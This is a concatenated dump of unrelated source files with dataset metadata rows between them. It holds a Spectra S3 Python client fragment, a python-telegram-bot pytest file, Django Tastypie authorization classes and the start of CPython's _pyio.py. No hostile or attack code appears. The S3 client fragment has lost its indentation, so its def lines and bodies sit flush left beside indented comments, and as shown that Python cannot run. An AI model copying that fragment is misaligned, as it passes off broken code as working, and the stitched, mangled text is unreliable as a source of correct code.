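        # Illustrative call within a bulk get job (sketch; names are placeholders):
        #   metadata = client.getObject("my_bucket", "obj.txt", 0, jobId)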
objectName = typeCheckString(objectName)
effectiveFileName = objectName
if realFileName:
effectiveFileName = typeCheckString(realFileName)
response = POINTER(libds3.LibDs3Metadata)()
request = libds3.lib.ds3_init_get_object_for_job(typeCheckString(bucketName), objectName, offset, jobId)
localFile = open(effectiveFileName, "w")
error = libds3.lib.ds3_get_object_with_metadata(self._client, request, byref(c_int(localFile.fileno())), libds3.lib.ds3_write_to_fd, byref(response))
localFile.close()
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
metadata = extractMetadataFromResponse(response)
libds3.lib.ds3_free_metadata(response)
return metadata
def putBucket(self, bucketName):
'''
Creates a new bucket where objects can be stored.
'''
bucketName = typeCheckString(bucketName)
request = libds3.lib.ds3_init_put_bucket(bucketName)
error = libds3.lib.ds3_put_bucket(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def putObject(self, bucketName, objectName, offset, size, jobId, realFileName = None, metadata = None):
'''
Puts an object to the Spectra S3 endpoint. Use `realFileName` when the `objectName`
that you are putting to Spectra S3 does not match what is on the local filesystem.
Use metadata to set the metadata for the object. metadata's value should be
a dictionary, where keys are associated with either a value or a list of the
values for that key.
This can only be used within the context of a Spectra S3 Bulk Put job.
'''
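        # Illustrative call within a bulk put job (sketch; names are placeholders):
        #   client.putObject("my_bucket", "obj.txt", 0, 1024, jobId,
        #                    metadata={"project": ["demo"]})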
objectName = typeCheckString(objectName)
effectiveFileName = objectName
if realFileName:
effectiveFileName = typeCheckString(realFileName)
request = libds3.lib.ds3_init_put_object_for_job(typeCheckString(bucketName), objectName, offset, size, jobId)
addMetadataToRequest(request, metadata)
localFile = open(effectiveFileName, "r")
error = libds3.lib.ds3_put_object(self._client, request, byref(c_int(localFile.fileno())), libds3.lib.ds3_read_from_fd)
localFile.close()
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteObject(self, bucketName, objName):
'''
Deletes an object from the specified bucket. If deleting several files at once, use `deleteObjects` instead.
'''
request = libds3.lib.ds3_init_delete_object(typeCheckString(bucketName), typeCheckString(objName))
error = libds3.lib.ds3_delete_object(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteObjects(self, bucketName, fileNameList):
'''
Deletes multiple objects from the bucket using a single API call.
'''
bulkObjs = libds3.toDs3BulkObjectList(fileNameList)
request = libds3.lib.ds3_init_delete_objects(typeCheckString(bucketName))
error = libds3.lib.ds3_delete_objects(self._client, request, bulkObjs)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteBucket(self, bucketName):
'''
Deletes a bucket. If the bucket is not empty, then this request will fail. All objects must be deleted first
before the bucket can be deleted.
'''
request = libds3.lib.ds3_init_delete_bucket(typeCheckString(bucketName))
error = libds3.lib.ds3_delete_bucket(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def putBulk(self, bucketName, fileInfoList):
'''
Initiates a start bulk put with the remote Spectra S3 endpoint. The `fileInfoList` is a list of (objectName, size) tuples.
`objectName` does not have to be the actual name on the local file system, but it will be the name that you must
initiate a single object put to later. `size` must reflect the actual size of the file that is being put.
'''
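        # Illustrative call (sketch; names and sizes are placeholders):
        #   plan = client.putBulk("my_bucket", [("obj1.txt", 1024), ("obj2.txt", 2048)])
        #   # plan.jobId and plan.chunks drive the subsequent putObject calls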
bulkObjs = libds3.lib.ds3_init_bulk_object_list(len(fileInfoList))
bulkObjsList = bulkObjs.contents.list
for i in xrange(0, len(fileInfoList)):
bulkObjsList[i].name = libds3.lib.ds3_str_init(fileInfoList[i][0])
bulkObjsList[i].length = fileInfoList[i][1]
response = POINTER(libds3.LibDs3BulkResponse)()
request = libds3.lib.ds3_init_put_bulk(typeCheckString(bucketName), bulkObjs)
error = libds3.lib.ds3_bulk(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bulkResponse = Ds3BulkPlan(response)
libds3.lib.ds3_free_bulk_response(response)
return bulkResponse
def getBulk(self, bucketName, fileNameList, chunkOrdering = True):
'''
Initiates a start bulk get with the remote Spectra S3 endpoint. All the files that will be retrieved must be specified in
`fileNameList`.
'''
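        # Illustrative call (sketch; names are placeholders):
        #   plan = client.getBulk("my_bucket", ["obj1.txt", "obj2.txt"])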
bulkObjs = libds3.toDs3BulkObjectList(fileNameList)
response = POINTER(libds3.LibDs3BulkResponse)()
chunkOrderingValue = libds3.LibDs3ChunkOrdering.IN_ORDER
if not chunkOrdering:
chunkOrderingValue = libds3.LibDs3ChunkOrdering.NONE
request = libds3.lib.ds3_init_get_bulk(typeCheckString(bucketName), bulkObjs, chunkOrderingValue)
error = libds3.lib.ds3_bulk(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bulkResponse = Ds3BulkPlan(response)
libds3.lib.ds3_free_bulk_response(response)
return bulkResponse
def getObjects(self, bucketName = None, creationDate = None, objId = None, name = None, pageLength = None, pageOffset = None, objType = None, version = None):
'''
Returns a list of objects.
'''
# TODO: need to add an example here of what different query strings are supported
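        # Illustrative filtered query (sketch; values are placeholders):
        #   client.getObjects(bucketName="my_bucket", objType="DATA", pageLength=10)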
request = libds3.lib.ds3_init_get_objects()
response = POINTER(libds3.LibDs3GetObjectsResponse)()
if bucketName:
libds3.lib.ds3_request_set_bucket_name(request, typeCheckString(bucketName))
if creationDate:
libds3.lib.ds3_request_set_creation_date(request, typeCheckString(creationDate))
if objId:
libds3.lib.ds3_request_set_id(request, typeCheckString(objId))
if name:
libds3.lib.ds3_request_set_name(request, typeCheckString(name))
if pageLength:
libds3.lib.ds3_request_set_page_length(request, typeCheckString(str(pageLength)))
if pageOffset:
libds3.lib.ds3_request_set_page_offset(request, typeCheckString(str(pageOffset)))
if objType:
libds3.lib.ds3_request_set_type(request, enumCheckDs3ObjectType(objType))
if version:
libds3.lib.ds3_request_set_version(request, typeCheckString(str(version)))
error = libds3.lib.ds3_get_objects(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = arrayToList(response.contents.objects, response.contents.num_objects, wrapper = Ds3SearchObject)
libds3.lib.ds3_free_objects_response(response)
return result
def allocateChunk(self, chunkId):
'''
        *Deprecated* - Allocates a specific chunk in cache so that the objects
        in that chunk can safely be put without needing to handle 307 redirects.
'''
request = libds3.lib.ds3_init_allocate_chunk(chunkId)
response = POINTER(libds3.LibDs3AllocateChunkResponse)()
error = libds3.lib.ds3_allocate_chunk(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3AllocateChunkResponse(response)
libds3.lib.ds3_free_allocate_chunk_response(response)
return result
def getAvailableChunks(self, jobId):
'''
Returns a list of all chunks in a job that can currently be processed. It will return a subset of all chunks, and it
will return that same set of chunks until all the data in one of the chunks returned has been either completely gotten,
or been completely put.
'''
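        # Illustrative polling loop (sketch; a `time` import is assumed on the caller's side):
        #   chunks = client.getAvailableChunks(jobId)
        #   if not chunks.bulkPlan.chunks:
        #       time.sleep(chunks.retryAfter)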
request = libds3.lib.ds3_init_get_available_chunks(jobId)
response = POINTER(libds3.LibDs3GetAvailableChunksResponse)()
error = libds3.lib.ds3_get_available_chunks(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3AvailableChunksResponse(response)
libds3.lib.ds3_free_available_chunks_response(response)
return result
def _sendJobRequest(self, func, request):
response = POINTER(libds3.LibDs3BulkResponse)()
error = func(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bulkResponse = Ds3BulkPlan(response)
libds3.lib.ds3_free_bulk_response(response)
return bulkResponse
def getJob(self, jobId):
'''
Returns information about a job, including all the chunks in the job, as well as the status of the job.
'''
request = libds3.lib.ds3_init_get_job(jobId)
return self._sendJobRequest(libds3.lib.ds3_get_job, request)
def getJobs(self):
'''
Returns a list of all jobs.
'''
request = libds3.lib.ds3_init_get_jobs()
response = POINTER(libds3.LibDs3GetJobsResponse)()
error = libds3.lib.ds3_get_jobs(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = []
for index in xrange(0, response.contents.jobs_size):
result.append(Ds3BulkPlan(response.contents.jobs[index]))
libds3.lib.ds3_free_get_jobs_response(response)
return result
def putJob(self, jobId):
'''
Modifies a job to reset the timeout timer for the job.
'''
request = libds3.lib.ds3_init_put_job(jobId)
return self._sendJobRequest(libds3.lib.ds3_put_job, request)
def deleteJob(self, jobId):
'''
Cancels a currently in progress job.
'''
request = libds3.lib.ds3_init_delete_job(jobId)
error = libds3.lib.ds3_delete_job(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def getPhysicalPlacement(self, bucketName, fileNameList, fullDetails = False):
'''
Returns where in the Spectra S3 system each file in `fileNameList` is located.
'''
response = POINTER(libds3.LibDs3GetPhysicalPlacementResponse)()
bulkObjs = libds3.toDs3BulkObjectList(fileNameList)
        bucketName = typeCheckString(bucketName)
        if fullDetails:
            request = libds3.lib.ds3_init_get_physical_placement_full_details(bucketName, bulkObjs)
        else:
            request = libds3.lib.ds3_init_get_physical_placement(bucketName, bulkObjs)
error = libds3.lib.ds3_get_physical_placement(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
placements = []
if response:
placements = arrayToList(response.contents.tapes, response.contents.num_tapes, lambda obj: obj.barcode.contents.value)
libds3.lib.ds3_free_get_physical_placement_response(response)
return placements
| apache-2.0 | 667,016,001,873,500,500 | 42.148041 | 162 | 0.642284 | false |
rogerscristo/BotFWD | env/lib/python3.6/site-packages/pytests/test_inputtextmessagecontent.py | 1 | 3394 | #!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
import json
import pytest
from telegram import InputTextMessageContent, InputMessageContent, ParseMode
@pytest.fixture()
def json_dict():
return {
'parse_mode': TestInputTextMessageContent.parse_mode,
'message_text': TestInputTextMessageContent.message_text,
'disable_web_page_preview': TestInputTextMessageContent.disable_web_page_preview,
}
@pytest.fixture(scope='class')
def input_text_message_content():
return InputTextMessageContent(TestInputTextMessageContent.message_text,
parse_mode=TestInputTextMessageContent.parse_mode,
disable_web_page_preview=TestInputTextMessageContent.disable_web_page_preview)
class TestInputTextMessageContent:
message_text = '*message text*'
parse_mode = ParseMode.MARKDOWN
disable_web_page_preview = True
def test_de_json(self, json_dict, bot):
input_text_message_content_json = InputTextMessageContent.de_json(json_dict, bot)
assert input_text_message_content_json.parse_mode == self.parse_mode
assert input_text_message_content_json.message_text == self.message_text
assert input_text_message_content_json.disable_web_page_preview == \
self.disable_web_page_preview
def test_input_text_message_content_json_de_json_factory(self, json_dict, bot):
input_text_message_content_json = InputMessageContent.de_json(json_dict, bot)
assert isinstance(input_text_message_content_json, InputTextMessageContent)
def test_de_json_factory_without_required_args(self, json_dict, bot):
del (json_dict['message_text'])
input_text_message_content_json = InputMessageContent.de_json(json_dict, bot)
assert input_text_message_content_json is None
def test_to_json(self, input_text_message_content):
json.loads(input_text_message_content.to_json())
def test_to_dict(self, input_text_message_content):
input_text_message_content_dict = input_text_message_content.to_dict()
assert isinstance(input_text_message_content_dict, dict)
assert input_text_message_content_dict['message_text'] == \
input_text_message_content.message_text
assert input_text_message_content_dict['parse_mode'] == \
input_text_message_content.parse_mode
assert input_text_message_content_dict['disable_web_page_preview'] == \
input_text_message_content.disable_web_page_preview
| mit | -1,011,318,621,333,283,700 | 40.962025 | 113 | 0.696818 | false |
mohabusama/django-users-api | users_api/authorization.py | 1 | 1626 | from tastypie.exceptions import Unauthorized
from tastypie.authorization import Authorization, DjangoAuthorization
class UsersDjangoAuthorization(DjangoAuthorization):
def update_detail(self, object_list, bundle):
if bundle.request.user.id == bundle.obj.id:
return True
return super(UsersDjangoAuthorization, self).update_detail(
object_list, bundle)
class AdminOnlyAuthorization(Authorization):
def _is_authorized_list(self, object_list, bundle):
if bundle.request.user.is_superuser:
return object_list
raise Unauthorized('Admin only access.')
def _is_authorized_detail(self, object_list, bundle):
return bundle.request.user.is_superuser
def read_list(self, object_list, bundle):
return self._is_authorized_list(object_list, bundle)
def read_detail(self, object_list, bundle):
return self._is_authorized_detail(object_list, bundle)
def create_list(self, object_list, bundle):
return self._is_authorized_list(object_list, bundle)
def create_detail(self, object_list, bundle):
return self._is_authorized_detail(object_list, bundle)
def update_list(self, object_list, bundle):
return self._is_authorized_list(object_list, bundle)
def update_detail(self, object_list, bundle):
return self._is_authorized_detail(object_list, bundle)
def delete_list(self, object_list, bundle):
return self._is_authorized_list(object_list, bundle)
def delete_detail(self, object_list, bundle):
return self._is_authorized_detail(object_list, bundle)
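# --- Illustrative usage sketch (added; not part of the original module) ---
# Wiring one of these classes into a Tastypie resource happens through the
# resource's Meta. ``UserResource`` below is a hypothetical example and is
# left commented out because importing Django models needs a configured
# Django project.
#
# from django.contrib.auth.models import User
# from tastypie.resources import ModelResource
#
# class UserResource(ModelResource):
#     class Meta:
#         queryset = User.objects.all()
#         resource_name = 'users'
#         authorization = AdminOnlyAuthorization()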
| mit | 7,692,832,456,572,050,000 | 34.347826 | 69 | 0.700492 | false |
batermj/algorithm-challenger | code-analysis/programming_anguage/python/source_codes/Python3.8.0/Python-3.8.0/Lib/_pyio.py | 1 | 93037 | """
Python implementation of the io module.
"""
import os
import abc
import codecs
import errno
import stat
import sys
# Import _thread instead of threading to reduce startup cost
from _thread import allocate_lock as Lock
if sys.platform in {'win32', 'cygwin'}:
from msvcrt import setmode as _setmode
else:
_setmode = None
import io
from io import (__all__, SEEK_SET, SEEK_CUR, SEEK_END)
valid_seek_flags = {0, 1, 2} # Hardwired values
if hasattr(os, 'SEEK_HOLE'):
valid_seek_flags.add(os.SEEK_HOLE)
valid_seek_flags.add(os.SEEK_DATA)
# open() uses st_blksize whenever we can
DEFAULT_BUFFER_SIZE = 8 * 1024 # bytes
# NOTE: Base classes defined here are registered with the "official" ABCs
# defined in io.py. We don't use real inheritance though, because we don't want
# to inherit the C implementations.
# Rebind for compatibility
BlockingIOError = BlockingIOError
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
_IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def open(file, mode="r", buffering=-1, encoding=None, errors=None,
newline=None, closefd=True, opener=None):
r"""Open file and return a stream. Raise OSError upon failure.
file is either a text or byte string giving the name (and the path
if the file isn't in the current working directory) of the file to
be opened or an integer file descriptor of the file to be
wrapped. (If a file descriptor is given, it is closed when the
returned I/O object is closed, unless closefd is set to False.)
mode is an optional string that specifies the mode in which the file is
opened. It defaults to 'r' which means open for reading in text mode. Other
common values are 'w' for writing (truncating the file if it already
exists), 'x' for exclusive creation of a new file, and 'a' for appending
(which on some Unix systems, means that all writes append to the end of the
file regardless of the current seek position). In text mode, if encoding is
not specified the encoding used is platform dependent. (For reading and
writing raw bytes use binary mode and leave encoding unspecified.) The
available modes are:
========= ===============================================================
Character Meaning
--------- ---------------------------------------------------------------
'r' open for reading (default)
'w' open for writing, truncating the file first
'x' create a new file and open it for writing
'a' open for writing, appending to the end of the file if it exists
'b' binary mode
't' text mode (default)
'+' open a disk file for updating (reading and writing)
'U' universal newline mode (deprecated)
========= ===============================================================
The default mode is 'rt' (open for reading text). For binary random
access, the mode 'w+b' opens and truncates the file to 0 bytes, while
'r+b' opens the file without truncation. The 'x' mode implies 'w' and
    raises a `FileExistsError` if the file already exists.
Python distinguishes between files opened in binary and text modes,
even when the underlying operating system doesn't. Files opened in
binary mode (appending 'b' to the mode argument) return contents as
bytes objects without any decoding. In text mode (the default, or when
't' is appended to the mode argument), the contents of the file are
returned as strings, the bytes having been first decoded using a
platform-dependent encoding or using the specified encoding if given.
'U' mode is deprecated and will raise an exception in future versions
of Python. It has no effect in Python 3. Use newline to control
universal newlines mode.
buffering is an optional integer used to set the buffering policy.
Pass 0 to switch buffering off (only allowed in binary mode), 1 to select
line buffering (only usable in text mode), and an integer > 1 to indicate
the size of a fixed-size chunk buffer. When no buffering argument is
given, the default buffering policy works as follows:
* Binary files are buffered in fixed-size chunks; the size of the buffer
is chosen using a heuristic trying to determine the underlying device's
"block size" and falling back on `io.DEFAULT_BUFFER_SIZE`.
On many systems, the buffer will typically be 4096 or 8192 bytes long.
* "Interactive" text files (files for which isatty() returns True)
use line buffering. Other text files use the policy described above
for binary files.
encoding is the str name of the encoding used to decode or encode the
file. This should only be used in text mode. The default encoding is
platform dependent, but any encoding supported by Python can be
passed. See the codecs module for the list of supported encodings.
errors is an optional string that specifies how encoding errors are to
be handled---this argument should not be used in binary mode. Pass
'strict' to raise a ValueError exception if there is an encoding error
(the default of None has the same effect), or pass 'ignore' to ignore
errors. (Note that ignoring encoding errors can lead to data loss.)
See the documentation for codecs.register for a list of the permitted
encoding error strings.
newline is a string controlling how universal newlines works (it only
applies to text mode). It can be None, '', '\n', '\r', and '\r\n'. It works
as follows:
* On input, if newline is None, universal newlines mode is
enabled. Lines in the input can end in '\n', '\r', or '\r\n', and
these are translated into '\n' before being returned to the
caller. If it is '', universal newline mode is enabled, but line
endings are returned to the caller untranslated. If it has any of
the other legal values, input lines are only terminated by the given
string, and the line ending is returned to the caller untranslated.
* On output, if newline is None, any '\n' characters written are
translated to the system default line separator, os.linesep. If
newline is '', no translation takes place. If newline is any of the
other legal values, any '\n' characters written are translated to
the given string.
    closefd is a bool. If closefd is False, the underlying file descriptor will
be kept open when the file is closed. This does not work when a file name is
given and must be True in that case.
The newly created file is non-inheritable.
A custom opener can be used by passing a callable as *opener*. The
underlying file descriptor for the file object is then obtained by calling
*opener* with (*file*, *flags*). *opener* must return an open file
descriptor (passing os.open as *opener* results in functionality similar to
passing None).
open() returns a file object whose type depends on the mode, and
through which the standard file operations such as reading and writing
are performed. When open() is used to open a file in a text mode ('w',
'r', 'wt', 'rt', etc.), it returns a TextIOWrapper. When used to open
a file in a binary mode, the returned class varies: in read binary
mode, it returns a BufferedReader; in write binary and append binary
modes, it returns a BufferedWriter, and in read/write mode, it returns
a BufferedRandom.
It is also possible to use a string or bytearray as a file for both
reading and writing. For strings StringIO can be used like a file
opened in a text mode, and for bytes a BytesIO can be used like a file
opened in a binary mode.
"""
if not isinstance(file, int):
file = os.fspath(file)
if not isinstance(file, (str, bytes, int)):
raise TypeError("invalid file: %r" % file)
if not isinstance(mode, str):
raise TypeError("invalid mode: %r" % mode)
if not isinstance(buffering, int):
raise TypeError("invalid buffering: %r" % buffering)
if encoding is not None and not isinstance(encoding, str):
raise TypeError("invalid encoding: %r" % encoding)
if errors is not None and not isinstance(errors, str):
raise TypeError("invalid errors: %r" % errors)
modes = set(mode)
if modes - set("axrwb+tU") or len(mode) > len(modes):
raise ValueError("invalid mode: %r" % mode)
creating = "x" in modes
reading = "r" in modes
writing = "w" in modes
appending = "a" in modes
updating = "+" in modes
text = "t" in modes
binary = "b" in modes
if "U" in modes:
if creating or writing or appending or updating:
raise ValueError("mode U cannot be combined with 'x', 'w', 'a', or '+'")
import warnings
warnings.warn("'U' mode is deprecated",
DeprecationWarning, 2)
reading = True
if text and binary:
raise ValueError("can't have text and binary mode at once")
if creating + reading + writing + appending > 1:
raise ValueError("can't have read/write/append mode at once")
if not (creating or reading or writing or appending):
raise ValueError("must have exactly one of read/write/append mode")
if binary and encoding is not None:
raise ValueError("binary mode doesn't take an encoding argument")
if binary and errors is not None:
raise ValueError("binary mode doesn't take an errors argument")
if binary and newline is not None:
raise ValueError("binary mode doesn't take a newline argument")
if binary and buffering == 1:
import warnings
warnings.warn("line buffering (buffering=1) isn't supported in binary "
"mode, the default buffer size will be used",
RuntimeWarning, 2)
raw = FileIO(file,
(creating and "x" or "") +
(reading and "r" or "") +
(writing and "w" or "") +
(appending and "a" or "") +
(updating and "+" or ""),
closefd, opener=opener)
result = raw
try:
line_buffering = False
if buffering == 1 or buffering < 0 and raw.isatty():
buffering = -1
line_buffering = True
if buffering < 0:
buffering = DEFAULT_BUFFER_SIZE
try:
bs = os.fstat(raw.fileno()).st_blksize
except (OSError, AttributeError):
pass
else:
if bs > 1:
buffering = bs
if buffering < 0:
raise ValueError("invalid buffering size")
if buffering == 0:
if binary:
return result
raise ValueError("can't have unbuffered text I/O")
if updating:
buffer = BufferedRandom(raw, buffering)
elif creating or writing or appending:
buffer = BufferedWriter(raw, buffering)
elif reading:
buffer = BufferedReader(raw, buffering)
else:
raise ValueError("unknown mode: %r" % mode)
result = buffer
if binary:
return result
text = TextIOWrapper(buffer, encoding, errors, newline, line_buffering)
result = text
text.mode = mode
return result
except:
result.close()
raise
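# --- Illustrative example (added; not part of the original module) ---
# The concrete class returned by open() depends on mode and buffering; a
# quick check against a throwaway file (tempfile is from the stdlib):
def _demo_open_return_types():
    import tempfile
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        with open(path, "w") as f:                # text mode -> TextIOWrapper
            assert isinstance(f, TextIOWrapper)
        with open(path, "rb") as f:               # binary read -> BufferedReader
            assert isinstance(f, BufferedReader)
        with open(path, "rb", buffering=0) as f:  # unbuffered -> raw FileIO
            assert isinstance(f, FileIO)
    finally:
        os.remove(path)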
# Define a default pure-Python implementation for open_code()
# that does not allow hooks. Warn on first use. Defined for tests.
def _open_code_with_warning(path):
"""Opens the provided file with mode ``'rb'``. This function
should be used when the intent is to treat the contents as
executable code.
``path`` should be an absolute path.
When supported by the runtime, this function can be hooked
in order to allow embedders more control over code files.
This functionality is not supported on the current runtime.
"""
import warnings
warnings.warn("_pyio.open_code() may not be using hooks",
RuntimeWarning, 2)
return open(path, "rb")
try:
open_code = io.open_code
except AttributeError:
open_code = _open_code_with_warning
class DocDescriptor:
"""Helper for builtins.open.__doc__
"""
def __get__(self, obj, typ=None):
return (
"open(file, mode='r', buffering=-1, encoding=None, "
"errors=None, newline=None, closefd=True)\n\n" +
open.__doc__)
class OpenWrapper:
"""Wrapper for builtins.open
Trick so that open won't become a bound method when stored
as a class variable (as dbm.dumb does).
See initstdio() in Python/pylifecycle.c.
"""
__doc__ = DocDescriptor()
def __new__(cls, *args, **kwargs):
return open(*args, **kwargs)
# In normal operation, both `UnsupportedOperation`s should be bound to the
# same object.
try:
UnsupportedOperation = io.UnsupportedOperation
except AttributeError:
class UnsupportedOperation(OSError, ValueError):
pass
class IOBase(metaclass=abc.ABCMeta):
"""The abstract base class for all I/O classes, acting on streams of
bytes. There is no public constructor.
This class provides dummy implementations for many methods that
derived classes can override selectively; the default implementations
represent a file that cannot be read, written or seeked.
Even though IOBase does not declare read or write because
their signatures will vary, implementations and clients should
consider those methods part of the interface. Also, implementations
may raise UnsupportedOperation when operations they do not support are
called.
The basic type used for binary data read from or written to a file is
bytes. Other bytes-like objects are accepted as method arguments too.
Text I/O classes work with str data.
Note that calling any method (even inquiries) on a closed stream is
undefined. Implementations may raise OSError in this case.
IOBase (and its subclasses) support the iterator protocol, meaning
that an IOBase object can be iterated over yielding the lines in a
stream.
IOBase also supports the :keyword:`with` statement. In this example,
fp is closed after the suite of the with statement is complete:
with open('spam.txt', 'r') as fp:
fp.write('Spam and eggs!')
"""
### Internal ###
def _unsupported(self, name):
"""Internal: raise an OSError exception for unsupported operations."""
raise UnsupportedOperation("%s.%s() not supported" %
(self.__class__.__name__, name))
### Positioning ###
def seek(self, pos, whence=0):
"""Change stream position.
Change the stream position to byte offset pos. Argument pos is
interpreted relative to the position indicated by whence. Values
for whence are ints:
* 0 -- start of stream (the default); offset should be zero or positive
* 1 -- current stream position; offset may be negative
* 2 -- end of stream; offset is usually negative
Some operating systems / file systems could provide additional values.
Return an int indicating the new absolute position.
"""
self._unsupported("seek")
def tell(self):
"""Return an int indicating the current stream position."""
return self.seek(0, 1)
def truncate(self, pos=None):
"""Truncate file to size bytes.
Size defaults to the current IO position as reported by tell(). Return
the new size.
"""
self._unsupported("truncate")
### Flush and close ###
def flush(self):
"""Flush write buffers, if applicable.
This is not implemented for read-only and non-blocking streams.
"""
self._checkClosed()
# XXX Should this return the number of bytes written???
__closed = False
def close(self):
"""Flush and close the IO object.
This method has no effect if the file is already closed.
"""
if not self.__closed:
try:
self.flush()
finally:
self.__closed = True
def __del__(self):
"""Destructor. Calls close()."""
try:
closed = self.closed
except AttributeError:
# If getting closed fails, then the object is probably
# in an unusable state, so ignore.
return
if closed:
return
if _IOBASE_EMITS_UNRAISABLE:
self.close()
else:
# The try/except block is in case this is called at program
# exit time, when it's possible that globals have already been
# deleted, and then the close() call might fail. Since
# there's nothing we can do about such failures and they annoy
# the end users, we suppress the traceback.
try:
self.close()
except:
pass
### Inquiries ###
def seekable(self):
"""Return a bool indicating whether object supports random access.
If False, seek(), tell() and truncate() will raise OSError.
This method may need to do a test seek().
"""
return False
def _checkSeekable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not seekable
"""
if not self.seekable():
raise UnsupportedOperation("File or stream is not seekable."
if msg is None else msg)
def readable(self):
"""Return a bool indicating whether object was opened for reading.
If False, read() will raise OSError.
"""
return False
def _checkReadable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not readable
"""
if not self.readable():
raise UnsupportedOperation("File or stream is not readable."
if msg is None else msg)
def writable(self):
"""Return a bool indicating whether object was opened for writing.
If False, write() and truncate() will raise OSError.
"""
return False
def _checkWritable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not writable
"""
if not self.writable():
raise UnsupportedOperation("File or stream is not writable."
if msg is None else msg)
@property
def closed(self):
"""closed: bool. True iff the file has been closed.
For backwards compatibility, this is a property, not a predicate.
"""
return self.__closed
def _checkClosed(self, msg=None):
"""Internal: raise a ValueError if file is closed
"""
if self.closed:
raise ValueError("I/O operation on closed file."
if msg is None else msg)
### Context manager ###
def __enter__(self): # That's a forward reference
"""Context management protocol. Returns self (an instance of IOBase)."""
self._checkClosed()
return self
def __exit__(self, *args):
"""Context management protocol. Calls close()"""
self.close()
### Lower-level APIs ###
# XXX Should these be present even if unimplemented?
def fileno(self):
"""Returns underlying file descriptor (an int) if one exists.
An OSError is raised if the IO object does not use a file descriptor.
"""
self._unsupported("fileno")
def isatty(self):
"""Return a bool indicating whether this is an 'interactive' stream.
Return False if it can't be determined.
"""
self._checkClosed()
return False
### Readline[s] and writelines ###
def readline(self, size=-1):
r"""Read and return a line of bytes from the stream.
If size is specified, at most size bytes will be read.
Size should be an int.
The line terminator is always b'\n' for binary files; for text
files, the newlines argument to open can be used to select the line
terminator(s) recognized.
"""
# For backwards compatibility, a (slowish) readline().
if hasattr(self, "peek"):
def nreadahead():
readahead = self.peek(1)
if not readahead:
return 1
n = (readahead.find(b"\n") + 1) or len(readahead)
if size >= 0:
n = min(n, size)
return n
else:
def nreadahead():
return 1
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
res = bytearray()
while size < 0 or len(res) < size:
b = self.read(nreadahead())
if not b:
break
res += b
if res.endswith(b"\n"):
break
return bytes(res)
def __iter__(self):
self._checkClosed()
return self
def __next__(self):
line = self.readline()
if not line:
raise StopIteration
return line
def readlines(self, hint=None):
"""Return a list of lines from the stream.
hint can be specified to control the number of lines read: no more
lines will be read if the total size (in bytes/characters) of all
lines so far exceeds hint.
"""
if hint is None or hint <= 0:
return list(self)
n = 0
lines = []
for line in self:
lines.append(line)
n += len(line)
if n >= hint:
break
return lines
def writelines(self, lines):
"""Write a list of lines to the stream.
Line separators are not added, so it is usual for each of the lines
provided to have a line separator at the end.
"""
self._checkClosed()
for line in lines:
self.write(line)
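# --- Illustrative example (added; not part of the original module) ---
# __iter__/__next__ above are what make `for line in stream` work: any
# IOBase subclass with a working readline() gets iteration for free.
def _demo_iteration():
    stream = BytesIO(b"one\ntwo\nthree")
    assert list(stream) == [b"one\n", b"two\n", b"three"]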
io.IOBase.register(IOBase)
class RawIOBase(IOBase):
"""Base class for raw binary I/O."""
# The read() method is implemented by calling readinto(); derived
# classes that want to support read() only need to implement
# readinto() as a primitive operation. In general, readinto() can be
# more efficient than read().
# (It would be tempting to also provide an implementation of
# readinto() in terms of read(), in case the latter is a more suitable
# primitive operation, but that would lead to nasty recursion in case
# a subclass doesn't implement either.)
def read(self, size=-1):
"""Read and return up to size bytes, where size is an int.
Returns an empty bytes object on EOF, or None if the object is
set not to block and has no data to read.
"""
if size is None:
size = -1
if size < 0:
return self.readall()
b = bytearray(size.__index__())
n = self.readinto(b)
if n is None:
return None
del b[n:]
return bytes(b)
def readall(self):
"""Read until EOF, using multiple read() call."""
res = bytearray()
while True:
data = self.read(DEFAULT_BUFFER_SIZE)
if not data:
break
res += data
if res:
return bytes(res)
else:
# b'' or None
return data
def readinto(self, b):
"""Read bytes into a pre-allocated bytes-like object b.
Returns an int representing the number of bytes read (0 for EOF), or
None if the object is set not to block and has no data to read.
"""
self._unsupported("readinto")
def write(self, b):
"""Write the given buffer to the IO stream.
Returns the number of bytes written, which may be less than the
length of b in bytes.
"""
self._unsupported("write")
io.RawIOBase.register(RawIOBase)
from _io import FileIO
RawIOBase.register(FileIO)
class BufferedIOBase(IOBase):
